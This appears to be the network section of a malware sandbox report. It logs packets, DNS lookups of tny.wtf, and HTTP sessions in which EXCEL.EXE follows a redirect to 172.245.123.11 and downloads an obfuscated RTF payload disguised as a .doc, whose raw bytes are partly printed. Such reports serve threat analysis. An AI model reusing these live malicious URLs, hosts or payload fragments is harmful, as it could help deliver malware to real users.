      Jul 30, 2024 18:28:04.841811895 CEST4916680192.168.2.22172.245.123.11
      Jul 30, 2024 18:28:04.842349052 CEST8049166172.245.123.11192.168.2.22
      Jul 30, 2024 18:28:04.842359066 CEST8049166172.245.123.11192.168.2.22
      Jul 30, 2024 18:28:04.842369080 CEST8049166172.245.123.11192.168.2.22
      Jul 30, 2024 18:28:04.842377901 CEST8049166172.245.123.11192.168.2.22
      Jul 30, 2024 18:28:04.842387915 CEST8049166172.245.123.11192.168.2.22
      Jul 30, 2024 18:28:04.842401028 CEST4916680192.168.2.22172.245.123.11
      Jul 30, 2024 18:28:04.842401981 CEST8049166172.245.123.11192.168.2.22
      Jul 30, 2024 18:28:04.842412949 CEST8049166172.245.123.11192.168.2.22
      Jul 30, 2024 18:28:04.842422962 CEST8049166172.245.123.11192.168.2.22
      Jul 30, 2024 18:28:04.842422962 CEST4916680192.168.2.22172.245.123.11
      Jul 30, 2024 18:28:04.842436075 CEST8049166172.245.123.11192.168.2.22
      Jul 30, 2024 18:28:04.842441082 CEST4916680192.168.2.22172.245.123.11
      Jul 30, 2024 18:28:04.842446089 CEST8049166172.245.123.11192.168.2.22
      Jul 30, 2024 18:28:04.842458010 CEST8049166172.245.123.11192.168.2.22
      Jul 30, 2024 18:28:04.842464924 CEST4916680192.168.2.22172.245.123.11
      Jul 30, 2024 18:28:04.842468023 CEST8049166172.245.123.11192.168.2.22
      Jul 30, 2024 18:28:04.842478991 CEST8049166172.245.123.11192.168.2.22
      Jul 30, 2024 18:28:04.842480898 CEST4916680192.168.2.22172.245.123.11
      Jul 30, 2024 18:28:04.842490911 CEST8049166172.245.123.11192.168.2.22
      Jul 30, 2024 18:28:04.842508078 CEST4916680192.168.2.22172.245.123.11
      Jul 30, 2024 18:28:04.842530966 CEST4916680192.168.2.22172.245.123.11
      Jul 30, 2024 18:28:04.842730045 CEST4916680192.168.2.22172.245.123.11
      Jul 30, 2024 18:28:04.845442057 CEST8049166172.245.123.11192.168.2.22
      Jul 30, 2024 18:28:04.845453024 CEST8049166172.245.123.11192.168.2.22
      Jul 30, 2024 18:28:04.845463991 CEST8049166172.245.123.11192.168.2.22
      Jul 30, 2024 18:28:04.845494986 CEST4916680192.168.2.22172.245.123.11
      Jul 30, 2024 18:28:04.845518112 CEST4916680192.168.2.22172.245.123.11
      Jul 30, 2024 18:28:04.845773935 CEST8049166172.245.123.11192.168.2.22
      Jul 30, 2024 18:28:04.845818043 CEST4916680192.168.2.22172.245.123.11
      Jul 30, 2024 18:28:04.845846891 CEST8049166172.245.123.11192.168.2.22
      Jul 30, 2024 18:28:04.845855951 CEST8049166172.245.123.11192.168.2.22
      Jul 30, 2024 18:28:04.845885038 CEST4916680192.168.2.22172.245.123.11
      Jul 30, 2024 18:28:04.845896959 CEST4916680192.168.2.22172.245.123.11
      Jul 30, 2024 18:28:04.845971107 CEST8049166172.245.123.11192.168.2.22
      Jul 30, 2024 18:28:04.845982075 CEST8049166172.245.123.11192.168.2.22
      Jul 30, 2024 18:28:04.845989943 CEST8049166172.245.123.11192.168.2.22
      Jul 30, 2024 18:28:04.845999956 CEST8049166172.245.123.11192.168.2.22
      Jul 30, 2024 18:28:04.846021891 CEST4916680192.168.2.22172.245.123.11
      Jul 30, 2024 18:28:04.846036911 CEST4916680192.168.2.22172.245.123.11
      Jul 30, 2024 18:28:04.846055031 CEST4916680192.168.2.22172.245.123.11
      Jul 30, 2024 18:28:04.846191883 CEST8049166172.245.123.11192.168.2.22
      Jul 30, 2024 18:28:04.846236944 CEST4916680192.168.2.22172.245.123.11
      Jul 30, 2024 18:28:04.846286058 CEST8049166172.245.123.11192.168.2.22
      Jul 30, 2024 18:28:04.846297026 CEST8049166172.245.123.11192.168.2.22
      Jul 30, 2024 18:28:04.846308947 CEST8049166172.245.123.11192.168.2.22
      Jul 30, 2024 18:28:04.846319914 CEST8049166172.245.123.11192.168.2.22
      Jul 30, 2024 18:28:04.846328020 CEST4916680192.168.2.22172.245.123.11
      Jul 30, 2024 18:28:04.846330881 CEST8049166172.245.123.11192.168.2.22
      Jul 30, 2024 18:28:04.846342087 CEST8049166172.245.123.11192.168.2.22
      Jul 30, 2024 18:28:04.846347094 CEST4916680192.168.2.22172.245.123.11
      Jul 30, 2024 18:28:04.846352100 CEST8049166172.245.123.11192.168.2.22
      Jul 30, 2024 18:28:04.846368074 CEST4916680192.168.2.22172.245.123.11
      Jul 30, 2024 18:28:04.846390009 CEST4916680192.168.2.22172.245.123.11
      Jul 30, 2024 18:28:04.922300100 CEST8049166172.245.123.11192.168.2.22
      Jul 30, 2024 18:28:04.922341108 CEST8049166172.245.123.11192.168.2.22
      Jul 30, 2024 18:28:04.922352076 CEST8049166172.245.123.11192.168.2.22
      Jul 30, 2024 18:28:04.922408104 CEST4916680192.168.2.22172.245.123.11
      Jul 30, 2024 18:28:04.922455072 CEST4916680192.168.2.22172.245.123.11
      Jul 30, 2024 18:28:04.922488928 CEST8049166172.245.123.11192.168.2.22
      Jul 30, 2024 18:28:04.922499895 CEST8049166172.245.123.11192.168.2.22
      Jul 30, 2024 18:28:04.922508955 CEST8049166172.245.123.11192.168.2.22
      Jul 30, 2024 18:28:04.922519922 CEST8049166172.245.123.11192.168.2.22
      Jul 30, 2024 18:28:04.922533035 CEST4916680192.168.2.22172.245.123.11
      Jul 30, 2024 18:28:04.922553062 CEST4916680192.168.2.22172.245.123.11
      Jul 30, 2024 18:28:04.922884941 CEST8049166172.245.123.11192.168.2.22
      Jul 30, 2024 18:28:04.922895908 CEST8049166172.245.123.11192.168.2.22
      Jul 30, 2024 18:28:04.922904968 CEST8049166172.245.123.11192.168.2.22
      Jul 30, 2024 18:28:04.922914028 CEST8049166172.245.123.11192.168.2.22
      Jul 30, 2024 18:28:04.922928095 CEST8049166172.245.123.11192.168.2.22
      Jul 30, 2024 18:28:04.922946930 CEST4916680192.168.2.22172.245.123.11
      Jul 30, 2024 18:28:04.922971010 CEST4916680192.168.2.22172.245.123.11
      Jul 30, 2024 18:28:04.923273087 CEST8049166172.245.123.11192.168.2.22
      Jul 30, 2024 18:28:04.923284054 CEST8049166172.245.123.11192.168.2.22
      Jul 30, 2024 18:28:04.923295021 CEST8049166172.245.123.11192.168.2.22
      Jul 30, 2024 18:28:04.923310041 CEST8049166172.245.123.11192.168.2.22
      Jul 30, 2024 18:28:04.923321962 CEST4916680192.168.2.22172.245.123.11
      Jul 30, 2024 18:28:04.923331022 CEST8049166172.245.123.11192.168.2.22
      Jul 30, 2024 18:28:04.923341036 CEST4916680192.168.2.22172.245.123.11
      Jul 30, 2024 18:28:04.923347950 CEST8049166172.245.123.11192.168.2.22
      Jul 30, 2024 18:28:04.923361063 CEST8049166172.245.123.11192.168.2.22
      Jul 30, 2024 18:28:04.923372984 CEST8049166172.245.123.11192.168.2.22
      Jul 30, 2024 18:28:04.923377991 CEST4916680192.168.2.22172.245.123.11
      Jul 30, 2024 18:28:04.923384905 CEST8049166172.245.123.11192.168.2.22
      Jul 30, 2024 18:28:04.923396111 CEST4916680192.168.2.22172.245.123.11
      Jul 30, 2024 18:28:04.923398018 CEST8049166172.245.123.11192.168.2.22
      Jul 30, 2024 18:28:04.923407078 CEST4916680192.168.2.22172.245.123.11
      Jul 30, 2024 18:28:04.923432112 CEST4916680192.168.2.22172.245.123.11
      Jul 30, 2024 18:28:04.924026012 CEST8049166172.245.123.11192.168.2.22
      Jul 30, 2024 18:28:04.924037933 CEST8049166172.245.123.11192.168.2.22
      Jul 30, 2024 18:28:04.924048901 CEST8049166172.245.123.11192.168.2.22
      Jul 30, 2024 18:28:04.924061060 CEST8049166172.245.123.11192.168.2.22
      Jul 30, 2024 18:28:04.924073935 CEST8049166172.245.123.11192.168.2.22
      Jul 30, 2024 18:28:04.924074888 CEST4916680192.168.2.22172.245.123.11
      Jul 30, 2024 18:28:04.924089909 CEST4916680192.168.2.22172.245.123.11
      Jul 30, 2024 18:28:04.924119949 CEST4916680192.168.2.22172.245.123.11
      Jul 30, 2024 18:28:04.924530029 CEST8049166172.245.123.11192.168.2.22
      Jul 30, 2024 18:28:04.924541950 CEST8049166172.245.123.11192.168.2.22
      Jul 30, 2024 18:28:04.924552917 CEST8049166172.245.123.11192.168.2.22
      Jul 30, 2024 18:28:04.924565077 CEST8049166172.245.123.11192.168.2.22
      Jul 30, 2024 18:28:04.924571991 CEST4916680192.168.2.22172.245.123.11
      Jul 30, 2024 18:28:04.924577951 CEST8049166172.245.123.11192.168.2.22
      Jul 30, 2024 18:28:04.924590111 CEST8049166172.245.123.11192.168.2.22
      Jul 30, 2024 18:28:04.924596071 CEST4916680192.168.2.22172.245.123.11
      Jul 30, 2024 18:28:04.924602985 CEST8049166172.245.123.11192.168.2.22
      Jul 30, 2024 18:28:04.924614906 CEST8049166172.245.123.11192.168.2.22
      Jul 30, 2024 18:28:04.924623966 CEST4916680192.168.2.22172.245.123.11
      Jul 30, 2024 18:28:04.924627066 CEST8049166172.245.123.11192.168.2.22
      Jul 30, 2024 18:28:04.924639940 CEST8049166172.245.123.11192.168.2.22
      Jul 30, 2024 18:28:04.924650908 CEST8049166172.245.123.11192.168.2.22
      Jul 30, 2024 18:28:04.924657106 CEST4916680192.168.2.22172.245.123.11
      Jul 30, 2024 18:28:04.924663067 CEST8049166172.245.123.11192.168.2.22
      Jul 30, 2024 18:28:04.924674034 CEST4916680192.168.2.22172.245.123.11
      Jul 30, 2024 18:28:04.924695969 CEST4916680192.168.2.22172.245.123.11
      Jul 30, 2024 18:28:04.925462008 CEST8049166172.245.123.11192.168.2.22
      Jul 30, 2024 18:28:04.925479889 CEST8049166172.245.123.11192.168.2.22
      Jul 30, 2024 18:28:04.925491095 CEST8049166172.245.123.11192.168.2.22
      Jul 30, 2024 18:28:04.925503016 CEST8049166172.245.123.11192.168.2.22
      Jul 30, 2024 18:28:04.925513029 CEST4916680192.168.2.22172.245.123.11
      Jul 30, 2024 18:28:04.925518036 CEST8049166172.245.123.11192.168.2.22
      Jul 30, 2024 18:28:04.925530910 CEST8049166172.245.123.11192.168.2.22
      Jul 30, 2024 18:28:04.925543070 CEST8049166172.245.123.11192.168.2.22
      Jul 30, 2024 18:28:04.925549030 CEST4916680192.168.2.22172.245.123.11
      Jul 30, 2024 18:28:04.925555944 CEST8049166172.245.123.11192.168.2.22
      Jul 30, 2024 18:28:04.925568104 CEST8049166172.245.123.11192.168.2.22
      Jul 30, 2024 18:28:04.925579071 CEST8049166172.245.123.11192.168.2.22
      Jul 30, 2024 18:28:04.925584078 CEST4916680192.168.2.22172.245.123.11
      Jul 30, 2024 18:28:04.925590992 CEST8049166172.245.123.11192.168.2.22
      Jul 30, 2024 18:28:04.925604105 CEST8049166172.245.123.11192.168.2.22
      Jul 30, 2024 18:28:04.925604105 CEST4916680192.168.2.22172.245.123.11
      Jul 30, 2024 18:28:04.925623894 CEST4916680192.168.2.22172.245.123.11
      Jul 30, 2024 18:28:04.925645113 CEST4916680192.168.2.22172.245.123.11
      Jul 30, 2024 18:28:04.926438093 CEST8049166172.245.123.11192.168.2.22
      Jul 30, 2024 18:28:04.926450014 CEST8049166172.245.123.11192.168.2.22
      Jul 30, 2024 18:28:04.926460028 CEST8049166172.245.123.11192.168.2.22
      Jul 30, 2024 18:28:04.926472902 CEST8049166172.245.123.11192.168.2.22
      Jul 30, 2024 18:28:04.926484108 CEST8049166172.245.123.11192.168.2.22
      Jul 30, 2024 18:28:04.926493883 CEST4916680192.168.2.22172.245.123.11
      Jul 30, 2024 18:28:04.926496029 CEST8049166172.245.123.11192.168.2.22
      Jul 30, 2024 18:28:04.926507950 CEST8049166172.245.123.11192.168.2.22
      Jul 30, 2024 18:28:04.926518917 CEST4916680192.168.2.22172.245.123.11
      Jul 30, 2024 18:28:04.926521063 CEST8049166172.245.123.11192.168.2.22
      Jul 30, 2024 18:28:04.926532030 CEST8049166172.245.123.11192.168.2.22
      Jul 30, 2024 18:28:04.926544905 CEST4916680192.168.2.22172.245.123.11
      Jul 30, 2024 18:28:04.926546097 CEST8049166172.245.123.11192.168.2.22
      Jul 30, 2024 18:28:04.926558971 CEST8049166172.245.123.11192.168.2.22
      Jul 30, 2024 18:28:04.926563978 CEST4916680192.168.2.22172.245.123.11
      Jul 30, 2024 18:28:04.926573038 CEST8049166172.245.123.11192.168.2.22
      Jul 30, 2024 18:28:04.926587105 CEST4916680192.168.2.22172.245.123.11
      Jul 30, 2024 18:28:04.926608086 CEST4916680192.168.2.22172.245.123.11
      Jul 30, 2024 18:28:04.927354097 CEST8049166172.245.123.11192.168.2.22
      Jul 30, 2024 18:28:04.927366018 CEST8049166172.245.123.11192.168.2.22
      Jul 30, 2024 18:28:04.927376986 CEST8049166172.245.123.11192.168.2.22
      Jul 30, 2024 18:28:04.927388906 CEST8049166172.245.123.11192.168.2.22
      Jul 30, 2024 18:28:04.927400112 CEST8049166172.245.123.11192.168.2.22
      Jul 30, 2024 18:28:04.927411079 CEST8049166172.245.123.11192.168.2.22
      Jul 30, 2024 18:28:04.927416086 CEST8049166172.245.123.11192.168.2.22
      Jul 30, 2024 18:28:04.927422047 CEST8049166172.245.123.11192.168.2.22
      Jul 30, 2024 18:28:04.927433014 CEST8049166172.245.123.11192.168.2.22
      Jul 30, 2024 18:28:04.927445889 CEST8049166172.245.123.11192.168.2.22
      Jul 30, 2024 18:28:04.927448034 CEST4916680192.168.2.22172.245.123.11
      Jul 30, 2024 18:28:04.927459002 CEST8049166172.245.123.11192.168.2.22
      Jul 30, 2024 18:28:04.927469969 CEST8049166172.245.123.11192.168.2.22
      Jul 30, 2024 18:28:04.927470922 CEST4916680192.168.2.22172.245.123.11
      Jul 30, 2024 18:28:04.927481890 CEST8049166172.245.123.11192.168.2.22
      Jul 30, 2024 18:28:04.927501917 CEST4916680192.168.2.22172.245.123.11
      Jul 30, 2024 18:28:04.927516937 CEST4916680192.168.2.22172.245.123.11
      Jul 30, 2024 18:28:04.928262949 CEST8049166172.245.123.11192.168.2.22
      Jul 30, 2024 18:28:04.928275108 CEST8049166172.245.123.11192.168.2.22
      Jul 30, 2024 18:28:04.928284883 CEST8049166172.245.123.11192.168.2.22
      Jul 30, 2024 18:28:04.928297997 CEST8049166172.245.123.11192.168.2.22
      Jul 30, 2024 18:28:04.928308964 CEST8049166172.245.123.11192.168.2.22
      Jul 30, 2024 18:28:04.928323030 CEST8049166172.245.123.11192.168.2.22
      Jul 30, 2024 18:28:04.928330898 CEST4916680192.168.2.22172.245.123.11
      Jul 30, 2024 18:28:04.928335905 CEST8049166172.245.123.11192.168.2.22
      Jul 30, 2024 18:28:04.928349018 CEST8049166172.245.123.11192.168.2.22
      Jul 30, 2024 18:28:04.928354025 CEST4916680192.168.2.22172.245.123.11
      Jul 30, 2024 18:28:04.928375006 CEST4916680192.168.2.22172.245.123.11
      Jul 30, 2024 18:28:04.928394079 CEST4916680192.168.2.22172.245.123.11
      Jul 30, 2024 18:28:04.928726912 CEST8049166172.245.123.11192.168.2.22
      Jul 30, 2024 18:28:04.928772926 CEST4916680192.168.2.22172.245.123.11
      Jul 30, 2024 18:28:04.928955078 CEST8049166172.245.123.11192.168.2.22
      Jul 30, 2024 18:28:04.928991079 CEST4916680192.168.2.22172.245.123.11
      Jul 30, 2024 18:28:04.929020882 CEST8049166172.245.123.11192.168.2.22
      Jul 30, 2024 18:28:04.929033041 CEST8049166172.245.123.11192.168.2.22
      Jul 30, 2024 18:28:04.929069042 CEST4916680192.168.2.22172.245.123.11
      Jul 30, 2024 18:28:04.929152966 CEST8049166172.245.123.11192.168.2.22
      Jul 30, 2024 18:28:04.929168940 CEST8049166172.245.123.11192.168.2.22
      Jul 30, 2024 18:28:04.929179907 CEST8049166172.245.123.11192.168.2.22
      Jul 30, 2024 18:28:04.929192066 CEST4916680192.168.2.22172.245.123.11
      Jul 30, 2024 18:28:04.929193020 CEST8049166172.245.123.11192.168.2.22
      Jul 30, 2024 18:28:04.929207087 CEST4916680192.168.2.22172.245.123.11
      Jul 30, 2024 18:28:04.929234028 CEST4916680192.168.2.22172.245.123.11
      Jul 30, 2024 18:28:04.929475069 CEST8049166172.245.123.11192.168.2.22
      Jul 30, 2024 18:28:04.929517031 CEST4916680192.168.2.22172.245.123.11
      Jul 30, 2024 18:28:04.963026047 CEST4916680192.168.2.22172.245.123.11
      Jul 30, 2024 18:28:04.968044996 CEST8049166172.245.123.11192.168.2.22
      Jul 30, 2024 18:28:04.968070984 CEST8049166172.245.123.11192.168.2.22
      Jul 30, 2024 18:28:04.968082905 CEST8049166172.245.123.11192.168.2.22
      Jul 30, 2024 18:28:04.968106031 CEST4916680192.168.2.22172.245.123.11
      Jul 30, 2024 18:28:04.968127966 CEST4916680192.168.2.22172.245.123.11
      Jul 30, 2024 18:28:04.968255043 CEST8049166172.245.123.11192.168.2.22
      Jul 30, 2024 18:28:04.968269110 CEST8049166172.245.123.11192.168.2.22
      Jul 30, 2024 18:28:04.968281984 CEST8049166172.245.123.11192.168.2.22
      Jul 30, 2024 18:28:04.968293905 CEST8049166172.245.123.11192.168.2.22
      Jul 30, 2024 18:28:04.968303919 CEST4916680192.168.2.22172.245.123.11
      Jul 30, 2024 18:28:04.968328953 CEST4916680192.168.2.22172.245.123.11
      Jul 30, 2024 18:28:04.968343973 CEST4916680192.168.2.22172.245.123.11
      Jul 30, 2024 18:28:04.968521118 CEST8049166172.245.123.11192.168.2.22
      Jul 30, 2024 18:28:04.968569994 CEST4916680192.168.2.22172.245.123.11
      Jul 30, 2024 18:28:05.598499060 CEST4916680192.168.2.22172.245.123.11
      Jul 30, 2024 18:28:08.077224970 CEST4916780192.168.2.22198.46.176.133
      Jul 30, 2024 18:28:08.082283974 CEST8049167198.46.176.133192.168.2.22
      Jul 30, 2024 18:28:08.082362890 CEST4916780192.168.2.22198.46.176.133
      Jul 30, 2024 18:28:08.083062887 CEST4916780192.168.2.22198.46.176.133
      Jul 30, 2024 18:28:08.087943077 CEST8049167198.46.176.133192.168.2.22
      Jul 30, 2024 18:28:29.467525959 CEST8049167198.46.176.133192.168.2.22
      Jul 30, 2024 18:28:29.467614889 CEST4916780192.168.2.22198.46.176.133
      Jul 30, 2024 18:28:29.471944094 CEST4916780192.168.2.22198.46.176.133
      Jul 30, 2024 18:28:29.472356081 CEST4916880192.168.2.22198.46.176.133
      Jul 30, 2024 18:28:29.477256060 CEST8049167198.46.176.133192.168.2.22
      Jul 30, 2024 18:28:29.479418993 CEST8049168198.46.176.133192.168.2.22
      Jul 30, 2024 18:28:29.479500055 CEST4916880192.168.2.22198.46.176.133
      Jul 30, 2024 18:28:29.479597092 CEST4916880192.168.2.22198.46.176.133
      Jul 30, 2024 18:28:29.485089064 CEST8049168198.46.176.133192.168.2.22
      Jul 30, 2024 18:28:51.124517918 CEST8049168198.46.176.133192.168.2.22
      Jul 30, 2024 18:28:51.124672890 CEST4916880192.168.2.22198.46.176.133
      Jul 30, 2024 18:28:51.124761105 CEST4916880192.168.2.22198.46.176.133
      Jul 30, 2024 18:28:51.126899004 CEST8049168198.46.176.133192.168.2.22
      Jul 30, 2024 18:28:51.126977921 CEST4916880192.168.2.22198.46.176.133
      Jul 30, 2024 18:28:51.131622076 CEST8049168198.46.176.133192.168.2.22
      Jul 30, 2024 18:28:56.729355097 CEST4916380192.168.2.22188.114.97.3
      Jul 30, 2024 18:28:56.729440928 CEST4916480192.168.2.22188.114.97.3
      TimestampSource PortDest PortSource IPDest IP
      Jul 30, 2024 18:27:54.647974014 CEST5456253192.168.2.228.8.8.8
      Jul 30, 2024 18:27:54.660079002 CEST53545628.8.8.8192.168.2.22
      Jul 30, 2024 18:27:57.010090113 CEST5291753192.168.2.228.8.8.8
      Jul 30, 2024 18:27:57.027168036 CEST53529178.8.8.8192.168.2.22
      Jul 30, 2024 18:27:58.717639923 CEST6275153192.168.2.228.8.8.8
      Jul 30, 2024 18:27:58.735488892 CEST53627518.8.8.8192.168.2.22
      Jul 30, 2024 18:27:58.739808083 CEST5789353192.168.2.228.8.8.8
      Jul 30, 2024 18:27:58.747100115 CEST53578938.8.8.8192.168.2.22
      Jul 30, 2024 18:28:02.544348955 CEST5482153192.168.2.228.8.8.8
      Jul 30, 2024 18:28:02.560107946 CEST53548218.8.8.8192.168.2.22
      Jul 30, 2024 18:28:02.561595917 CEST5471953192.168.2.228.8.8.8
      Jul 30, 2024 18:28:02.568835020 CEST53547198.8.8.8192.168.2.22
      TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
      Jul 30, 2024 18:27:54.647974014 CEST192.168.2.228.8.8.80x5f4cStandard query (0)tny.wtfA (IP address)IN (0x0001)false
      Jul 30, 2024 18:27:57.010090113 CEST192.168.2.228.8.8.80x65d1Standard query (0)tny.wtfA (IP address)IN (0x0001)false
      Jul 30, 2024 18:27:58.717639923 CEST192.168.2.228.8.8.80x77ecStandard query (0)tny.wtfA (IP address)IN (0x0001)false
      Jul 30, 2024 18:27:58.739808083 CEST192.168.2.228.8.8.80x608cStandard query (0)tny.wtfA (IP address)IN (0x0001)false
      Jul 30, 2024 18:28:02.544348955 CEST192.168.2.228.8.8.80x1100Standard query (0)tny.wtfA (IP address)IN (0x0001)false
      Jul 30, 2024 18:28:02.561595917 CEST192.168.2.228.8.8.80x2664Standard query (0)tny.wtfA (IP address)IN (0x0001)false
      TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
      Jul 30, 2024 18:27:54.660079002 CEST8.8.8.8192.168.2.220x5f4cNo error (0)tny.wtf188.114.97.3A (IP address)IN (0x0001)false
      Jul 30, 2024 18:27:54.660079002 CEST8.8.8.8192.168.2.220x5f4cNo error (0)tny.wtf188.114.96.3A (IP address)IN (0x0001)false
      Jul 30, 2024 18:27:57.027168036 CEST8.8.8.8192.168.2.220x65d1No error (0)tny.wtf188.114.97.3A (IP address)IN (0x0001)false
      Jul 30, 2024 18:27:57.027168036 CEST8.8.8.8192.168.2.220x65d1No error (0)tny.wtf188.114.96.3A (IP address)IN (0x0001)false
      Jul 30, 2024 18:27:58.735488892 CEST8.8.8.8192.168.2.220x77ecNo error (0)tny.wtf188.114.97.3A (IP address)IN (0x0001)false
      Jul 30, 2024 18:27:58.735488892 CEST8.8.8.8192.168.2.220x77ecNo error (0)tny.wtf188.114.96.3A (IP address)IN (0x0001)false
      Jul 30, 2024 18:27:58.747100115 CEST8.8.8.8192.168.2.220x608cNo error (0)tny.wtf188.114.96.3A (IP address)IN (0x0001)false
      Jul 30, 2024 18:27:58.747100115 CEST8.8.8.8192.168.2.220x608cNo error (0)tny.wtf188.114.97.3A (IP address)IN (0x0001)false
      Jul 30, 2024 18:28:02.560107946 CEST8.8.8.8192.168.2.220x1100No error (0)tny.wtf188.114.96.3A (IP address)IN (0x0001)false
      Jul 30, 2024 18:28:02.560107946 CEST8.8.8.8192.168.2.220x1100No error (0)tny.wtf188.114.97.3A (IP address)IN (0x0001)false
      Jul 30, 2024 18:28:02.568835020 CEST8.8.8.8192.168.2.220x2664No error (0)tny.wtf188.114.96.3A (IP address)IN (0x0001)false
      Jul 30, 2024 18:28:02.568835020 CEST8.8.8.8192.168.2.220x2664No error (0)tny.wtf188.114.97.3A (IP address)IN (0x0001)false
      • tny.wtf
      • 172.245.123.11
      • 198.46.176.133
      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
      0192.168.2.2249161188.114.97.3802900C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
      TimestampBytes transferredDirectionData
      Jul 30, 2024 18:27:54.671782017 CEST318OUTGET /EvwK HTTP/1.1
      Accept: */*
      UA-CPU: AMD64
      Accept-Encoding: gzip, deflate
      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
      Host: tny.wtf
      Connection: Keep-Alive
      Jul 30, 2024 18:27:55.789309025 CEST726INHTTP/1.1 302 Found
      Date: Tue, 30 Jul 2024 16:27:55 GMT
      Transfer-Encoding: chunked
      Connection: keep-alive
      Location: http://172.245.123.11/46/NO/seethesimplethingstobeunderstandeverythingverygreattoseetheatallfinetogetmebackwithentirethings________youreallyhappeyseeyou.doc
      X-Powered-By: ASP.NET
      CF-Cache-Status: DYNAMIC
      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=gyzzsJKmKkQ66v9L4zllekLMqmb5Q%2BOVr78uo4xLrSb2VJVsR8TXlb8KeVVHG8NjnTx9sc%2FWnv5CdChPyEM2BNQ9zrIeWvJ%2BkzbFHpAF1PXVaWn%2BZotyQw8U"}],"group":"cf-nel","max_age":604800}
      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
      Server: cloudflare
      CF-RAY: 8ab6b8053db643bc-EWR
      alt-svc: h3=":443"; ma=86400
      Data Raw: 30 0d 0a 0d 0a
      Data Ascii: 0


      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
      1192.168.2.2249162172.245.123.11802900C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
      TimestampBytes transferredDirectionData
      Jul 30, 2024 18:27:55.815092087 CEST455OUTGET /46/NO/seethesimplethingstobeunderstandeverythingverygreattoseetheatallfinetogetmebackwithentirethings________youreallyhappeyseeyou.doc HTTP/1.1
      Accept: */*
      UA-CPU: AMD64
      Accept-Encoding: gzip, deflate
      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
      Host: 172.245.123.11
      Connection: Keep-Alive
      Jul 30, 2024 18:27:56.328651905 CEST1236INHTTP/1.1 200 OK
      Date: Tue, 30 Jul 2024 16:27:56 GMT
      Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
      Last-Modified: Mon, 29 Jul 2024 05:56:25 GMT
      ETag: "17975-61e5c857cf545"
      Accept-Ranges: bytes
      Content-Length: 96629
      Keep-Alive: timeout=5, max=100
      Connection: Keep-Alive
      Content-Type: application/msword
      Data Raw: 7b 5c 72 74 66 31 0d 0d 0d 0d 09 09 09 7b 5c 2a 5c 6c 69 6e 65 43 72 4d 6f 64 31 35 32 38 38 34 39 35 36 20 5c 23 7d 0d 7b 5c 32 39 33 34 37 31 32 31 32 35 3d 5d 3f 3f 3f 34 60 3b 5e 3f 2a 21 34 34 38 a7 3b 39 25 28 3c a7 36 3f 24 a7 a7 3b 30 35 3e a7 34 2c 30 3f 33 2a 24 3c 2f 3f 25 3c 39 5d 29 31 5b 60 2d 27 3f 2d 7e 3b 60 34 25 b0 40 3f 3f 3b 25 35 b0 2c 23 3f 29 2c 25 2a 3f 39 31 29 37 2a 38 2b 34 37 3f 21 3e 2d 5f 3f b5 a7 36 31 25 33 3d 30 5f 21 7e 33 2a 35 2a 5b 3c b5 2a 3f 5d 26 32 28 33 35 37 25 3f 3f 5e 3f 37 3e 28 3b 3f 5b 21 38 5b 5f 5e 24 5b 33 28 2b 3f 5d 3c 3f 32 60 3e 36 35 34 5b 7e 3a 36 2d 2f 37 b0 34 24 5e a7 2e 23 3f 31 30 26 60 3a 29 60 38 3f 35 b0 31 2d 5f 7c 31 26 29 36 3e 25 3a 40 33 3f b5 21 3f 23 5b b5 3f 31 39 5b 7e 3f 31 34 27 33 36 25 33 30 39 26 3f 26 24 3b 3c 32 29 28 29 a7 7e 3d 2b 3f 3f 25 27 39 b0 3c 30 2d 25 33 3f 32 7c 38 3b 30 3a 25 5f 26 37 3f 26 28 27 2b 5b 39 40 31 3d 2c 7e 29 2e 39 23 7c 3a 30 b0 31 31 36 25 3d 5f 27 31 3a 3d 2e 25 3f 2a 2d 60 29 30 3c 38 a7 [TRUNCATED]
      Data Ascii: {\rtf1{\*\lineCrMod152884956 \#}{\2934712125=]???4`;^?*!448;9%(<6?$;05>4,0?3*$</?%<9])1[`-'?-~;`4%@??;%5,#?),%*?91)7*8+47?!>-_?61%3=0_!~3*5*[<*?]&2(357%??^?7>(;?[!8[_^$[3(+?]<?2`>654[~:6-/74$^.#?10&`:)`8?51-_|1&)6>%:@3?!?#[?19[~?14'36%309&?&$;<2)()~=+??%'9<0-%3?2|8;0:%_&7?&('+[9@1=,~).9#|:0116%=_'1:=.%?*-`)0<8&?1]==!:4_?*|:*,,%@$#/5],4`]|6!0)``@$?_%`#5@8!*|(*)~2]);_^^,%=+-+>'($]$%%`?=].%~>$7();7+=$:*.,>5#,'=(`!;;3%?7*)?@/$?;;?)4*,?,5-~3?;2~(?@4@?^17>?&_~?^*'-?.#%*<[97@?&7-=:88)&^%!_!~^8)|%<`.3%=!#:;1&#80_577?46;&^:,??4*/*.5@^($^4,&`%&?<??$13?4%&]<7|~3~9=?98+'?,*!)_/(5?$0]?(7:0)*0<32?;@74.%%7*_1~*1-&$#=5*&,[>+8:~,?`<'?(,^]3'|`'*7=!#|=-?5%-#[?/`-][]$6>:?+9?#5&#>^%)`+-|;2%15+>3.90.~;;?:[08??]5%$0<?468!!-:`)-9^33=!?.&9%-?,]1#]~>?;06`,?_2%%%?7|8)_:37^?58?|?1/>|2<=65_25'&;[?+?<@#`_#|,#57:6?<)2`,%?!_%%]6]?)#%@!((=?=@$]|]][^`[19=*.105&`=<]!=3+2#$%11?_[[*:
